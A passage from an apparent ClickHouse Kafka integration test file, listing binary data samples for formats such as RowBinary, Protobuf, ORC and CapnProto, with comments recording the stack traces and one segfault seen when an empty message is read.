b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# On empty message exception happens: DB::Exception: Cannot read all data. Bytes read: 0. Bytes expected: 8.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:108: void DB::readPODBinary<long>(long&, DB::ReadBuffer&) @ 0x15c67715 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:737: std::__1::enable_if<is_arithmetic_v<long>, void>::type DB::readBinary<long>(long&, DB::ReadBuffer&) @ 0x15e7afbd in /usr/bin/clickhouse
# /src/DataTypes/DataTypeNumberBase.cpp:180: DB::DataTypeNumberBase<long>::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cace581 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# !!! On empty message segfault: Address not mapped to object
# /contrib/FastMemcpy/FastMemcpy.h:666: memcpy_fast @ 0x21742d65 in /usr/bin/clickhouse
# /contrib/FastMemcpy/memcpy_wrapper.c:5: memcpy @ 0x21738235 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:145: DB::ReadBuffer::read(char*, unsigned long) @ 0x15c369d7 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:155: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c68878 in /usr/bin/clickhouse
# /src/DataTypes/DataTypeString.cpp:84: DB::DataTypeString::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cad12e7 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'Protobuf': {
'data_sample': [
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0d\x08\x01\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x02\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x03\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x04\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x05\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x06\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x07\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x08\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x09\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0a\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0c\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0d\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0e\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0f\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
# ''
# On empty message exception: Attempt to read after eof
# /src/IO/ReadBuffer.h:184: DB::ReadBuffer::throwReadAfterEOF() @ 0x15c9699b in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.h:115: DB::ProtobufReader::SimpleReader::startMessage() @ 0x1df4f828 in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.cpp:1119: DB::ProtobufReader::startMessage() @ 0x1df5356c in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ProtobufRowInputFormat.cpp:25: DB::ProtobufRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df4cc71 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestMessage'"
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# ''
# On empty message exception: IOError: File size too small, Stack trace (when copying this message, always include the lines below):
# /src/Processors/Formats/Impl/ORCBlockInputFormat.cpp:36: DB::ORCBlockInputFormat::generate() @ 0x1df282a6 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'CapnProto': {
'data_sample': [
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
# ''
# On empty message exception: Cannot read all data. Bytes read: 0. Bytes expected: 4.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:212: DB::CapnProtoRowInputFormat::readMessage() @ 0x1ded1cab in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:241: DB::CapnProtoRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1ded205d in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestRecordStruct'"
},
# 'Parquet' : {
# not working at all with Kafka: DB::Exception: IOError: Invalid Parquet file size is 0 bytes
# /contrib/libcxx/include/exception:129: std::exception::capture() @ 0x15c33fe8 in /usr/bin/clickhouse
# /contrib/libcxx/include/exception:109: std::exception::exception() @ 0x15c33fb5 in /usr/bin/clickhouse
# /contrib/poco/Foundation/src/Exception.cpp:27: Poco::Exception::Exception(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, int) @ 0x21877833 in /usr/bin/clickhouse
# /src/Common/Exception.cpp:37: DB::Exception::Exception(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, int) @ 0x15c2d2a3 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ParquetBlockInputFormat.cpp:70: DB::ParquetBlockInputFormat::prepareReader() @ 0x1df2b0c2 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ParquetBlockInputFormat.cpp:36: DB::ParquetBlockInputFormat::ParquetBlockInputFormat(DB::ReadBuffer&, DB::Block) @ 0x1df2af8b in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:2214: std::__1::__compressed_pair_elem<DB::ParquetBlockInputFormat, 1, false>::__compressed_pair_elem<DB::ReadBuffer&, DB::Block const&, 0ul, 1ul>(std::__1::piecewise_construct_t, std::__1::tuple<DB::ReadBuffer&, DB::Block const&>, std::__1::__tuple_indices<0ul, 1ul>) @ 0x1df2dc88 in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:2299: std::__1::__compressed_pair<std::__1::allocator<DB::ParquetBlockInputFormat>, DB::ParquetBlockInputFormat>::__compressed_pair<std::__1::allocator<DB::ParquetBlockInputFormat>&, DB::ReadBuffer&, DB::Block const&>(std::__1::piecewise_construct_t, std::__1::tuple<std::__1::allocator<DB::ParquetBlockInputFormat>&>, std::__1::tuple<DB::ReadBuffer&, DB::Block const&>) @ 0x1df2d9c8 in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:3569: std::__1::__shared_ptr_emplace<DB::ParquetBlockInputFormat, std::__1::allocator<DB::ParquetBlockInputFormat> >::__shared_ptr_emplace<DB::ReadBuffer&, DB::Block const&>(std::__1::allocator<DB::ParquetBlockInputFormat>, DB::ReadBuffer&, DB::Block const&) @ 0x1df2d687 in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:4400: std::__1::enable_if<!(is_array<DB::ParquetBlockInputFormat>::value), std::__1::shared_ptr<DB::ParquetBlockInputFormat> >::type std::__1::make_shared<DB::ParquetBlockInputFormat, DB::ReadBuffer&, DB::Block const&>(DB::ReadBuffer&, DB::Block const&) @ 0x1df2d455 in /usr/bin/clickhouse
